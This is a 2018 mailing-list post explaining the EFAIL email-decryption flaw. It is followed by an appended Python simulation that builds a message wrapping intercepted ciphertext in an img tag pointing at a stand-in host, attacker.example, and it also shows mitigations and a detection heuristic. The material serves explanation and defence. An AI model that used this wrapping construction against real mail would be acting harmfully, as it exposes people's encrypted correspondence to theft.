[RndTbl] PGP/GPG broken for email (S/MIME)

Trevor Cordes trevor at tecnopolis.ca
Mon May 14 23:24:08 CDT 2018


Nasty year for security 2018 is turning out to be.

Newly announced flaw in PGP/GPG when used for email that lets remote
hackers get copies of your encrypted emails (whether sender or
recipient).  Many (most?) email clients (MUAs) are not patched yet (but
the Linux ones should be shortly).

The encryption itself isn't broken, it's the way email clients and
their html parsers work that is being abused.  For the hack to work
you have to use a vulnerable email client that has built-in html
support (most do, but mine doesn't, yay!) and the attacker has to
intercept an encrypted email for/from you and then send it to you
wrapped in some naughty html.  Your email client then decrypts the
email and the naughty html promptly sends a copy to the attacker via
backchannels (getvars or similar in img tags hitting hacker servers).

To be clear, they can only use this hack to read emails they've already
intercepted and tricked you into opening in your HTML MUA.

If you use GPG from the command line you're basically safe.  It's still
good encryption (with a caveat about integrity checks that won't affect
most use cases).  GPG used for package signing, etc, is still safe.
GPG used for local file encryption is safe.

To be safe for email, update your MUA when it patches this, and ensure
all your contacts you PGP/GPG with do the same.  Unlike Spectre et al,
this one is fairly easy to fix assuming most people do it in a
reasonable amount of time (ya, I know).

Strangely, EFF recommends people phase out PGP/GPG email and have no
real recommended drop-in replacement.  I find this odd, as to me *some*
emails being hackable certainly beats *all* emails being hackable (i.e.
plaintext) which is basically what they are advocating.

Oh ya, this all could have been avoided if people stopped using HTML in
emails and HTML-capable MUAs.  <GRIN>
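The HTML-wrapping trick the message describes (an opening `<img src="` in one MIME part, the intercepted ciphertext in the next, the closing quote in a third) simulated end to end, as an added example that is not code from the original post or from any affected mail client. The attacker host, the addresses and the secret are made up; the gpg call is stood in for by a function that just decodes the bytes, since the point is what the MUA does with the decrypted text rather than the crypto; and has_unterminated_tag is a heuristic check of my own for spotting such messages, not a published mitigation.

```python
import email
import re
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

# Constructed values for the simulation; host, addresses and secret are made up.
ATTACKER_HOST = "attacker.example"
SECRET = "Meet at the safe house at 21:00"


def build_efail_message(intercepted_ciphertext: bytes) -> bytes:
    """Attacker side: wrap an intercepted encrypted part between two HTML
    parts so that, once decrypted, the plaintext lands inside an img URL."""
    outer = MIMEMultipart("mixed")
    outer["From"] = "mallory@example.net"
    outer["To"] = "victim@example.org"
    outer["Subject"] = "Re: your message"
    outer.attach(MIMEText('<img src="http://%s/' % ATTACKER_HOST, "html"))
    # In a real message this is the victim's OpenPGP ciphertext (normally a
    # multipart/encrypted container); a bare octet-stream part keeps it short.
    outer.attach(MIMEApplication(intercepted_ciphertext, "octet-stream"))
    outer.attach(MIMEText('">', "html"))
    return outer.as_bytes()


def decrypt_stub(ciphertext: bytes) -> str:
    """Stand-in for the MUA handing the part to gpg.  The sample 'ciphertext'
    is just the plaintext bytes so the example runs offline without keys."""
    return ciphertext.decode()


def _text_of(part) -> str:
    return part.get_payload(decode=True).decode(part.get_content_charset() or "ascii")


def _leaf_parts(raw: bytes):
    return [p for p in email.message_from_bytes(raw).walk() if not p.is_multipart()]


def _decoded_parts(raw: bytes, decrypt) -> list:
    """Every leaf part as text, with encrypted parts run through decrypt()."""
    out = []
    for part in _leaf_parts(raw):
        if part.get_content_type() == "application/octet-stream":
            out.append(decrypt(part.get_payload(decode=True)))
        else:
            out.append(_text_of(part))
    return out


def render_vulnerable(raw: bytes, decrypt) -> str:
    """Vulnerable MUA behaviour: decrypt each part, then glue all parts into
    ONE HTML document before handing it to the renderer."""
    return "".join(_decoded_parts(raw, decrypt))


def render_isolated(raw: bytes, decrypt) -> list:
    """Mitigated behaviour: each part is its own document, so a tag opened in
    one part cannot swallow the decrypted text of the next."""
    return _decoded_parts(raw, decrypt)


IMG_SRC = re.compile(r'<img\s+src="([^"]*)"', re.IGNORECASE)


def exfiltrated_urls(html: str) -> list:
    """URLs a renderer that loads remote images would fetch for this document."""
    return IMG_SRC.findall(html)


def has_unterminated_tag(raw: bytes) -> bool:
    """Heuristic a filter or MUA can apply before decrypting anything: a
    text/html part that opens a tag or attribute quote it never closes is
    the signature of the wrapping trick built above."""
    for part in _leaf_parts(raw):
        if part.get_content_type() != "text/html":
            continue
        html = _text_of(part)
        if html.count("<") > html.count(">") or html.count('"') % 2:
            return True
    return False


def build_benign_message() -> bytes:
    return MIMEText("<p>Nothing to see here.</p>", "html").as_bytes()


if __name__ == "__main__":
    raw = build_efail_message(SECRET.encode())
    print("vulnerable MUA fetches:", exfiltrated_urls(render_vulnerable(raw, decrypt_stub)))
    print("isolated rendering fetches:",
          [exfiltrated_urls(d) for d in render_isolated(raw, decrypt_stub)])
    print("flagged as suspicious:", has_unterminated_tag(raw))
```

Running it shows the concatenating client producing a single img URL that carries the whole decrypted secret to attacker.example, while rendering the parts separately produces no complete img tag at all. Refusing to load remote content blocks the fetch even in the concatenating client, which is why that setting is the first thing to check in an MUA that has not been patched yet.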

